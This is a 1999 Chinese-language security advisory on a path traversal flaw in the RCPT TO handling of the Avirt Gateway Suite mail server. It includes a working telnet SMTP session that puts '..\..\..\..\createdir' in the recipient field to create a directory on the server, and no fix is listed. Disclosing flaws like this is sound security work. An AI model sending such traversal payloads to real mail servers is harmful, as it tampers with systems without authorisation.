发布日期：1999-10-31
更新日期：1999-10-31

受影响系统：

Avirt Gateway Suite 3.5
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
Avirt Gateway Suite 3.3a
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
Avirt Gateway Suite 3.3
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0

描述：

---

aVirt邮件服务器在RPCT TO命令处理中包含一个漏洞。如果指定一个路径来代替email接收，攻击者可以在服务器本地系统中创建一个目录。

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

telnet targethost:25

> 220 server aVirt Mail SMTP Server Ready.
MAIL FROM: user
> 250 user, Sender OK
rcpt to:..\..\..\..\createdir
> 250 ..\..\..\..\createdir, Recipient OK
data
> 354 Please enter mail, ending with a "." on a line by itself
blablabla
.
> 250 Mail accepted.

这件造成邮件服务器在根目录下创建了一个名为”createdir"的目录。实验表明这种方法并不能覆盖已经存在的文件夹。




建议：

---

暂无

浏览次数：10302
严重程度：0（网友投票）